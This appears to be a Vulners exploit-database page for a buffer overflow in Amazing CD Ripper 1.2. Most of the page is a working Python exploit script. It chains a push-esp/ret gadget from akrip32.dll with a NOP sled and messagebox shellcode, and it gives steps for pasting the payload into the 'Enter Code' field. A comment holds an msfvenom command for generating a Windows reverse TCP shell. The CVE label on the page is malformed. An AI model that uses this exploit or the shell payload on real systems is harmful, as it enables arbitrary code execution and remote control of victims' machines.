Vulners
Lucene search
Amazing CD Ripper 1.2 Buffer Overflow Exploit
# Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow
# Exploit Author: Hejap Zairy
# Software Link: http://www.shelltoys.com/cd_ripper.exe
# Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit
# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'
# Author Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python
from pwn import *
buffer = "\x41" * 1016
# 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)
push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll
nops = "\x90" * 15 #515 tshhh theardlooo love Malware
#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff"
#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"
buf = b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer + push_esp + nops + buf + padding
try:
with open("0day_Hejap.txt","wb") as f:
print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("[-]File cannot be created")
# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2022 00:00Current
0.2Low risk
Vulners AI Score0.2